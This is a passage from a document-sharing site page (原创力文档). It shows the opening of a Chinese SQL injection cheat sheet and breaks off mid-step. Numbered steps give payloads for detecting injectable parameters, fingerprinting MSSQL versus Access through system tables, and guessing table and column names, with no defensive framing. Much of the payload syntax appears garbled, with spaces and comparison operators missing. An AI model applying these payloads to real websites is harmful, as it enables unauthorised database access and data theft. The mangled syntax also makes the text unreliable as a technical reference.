原创力文档- 0
- 0
- 约5.04万字
- 约 40页
- 2026-01-28 发布于中国
- 举报
1.判断是否有注入
;and1=1
;and1=2
2.初步判断是否是mssql
;anduser0
3.判断数据库系统
;and(selectcount(*)fromsysobjects)0mssql
;and(selectcount(*)frommsysobjects)0access
4.注入参数是字符
and[查询条件]and=
5.搜索时没过滤参数的
and[查询条件]and%25=
6.猜数表名
;and(selectCount(*)from[表名])0
7.猜字段
;and(selectCount(字段
文档评论(0)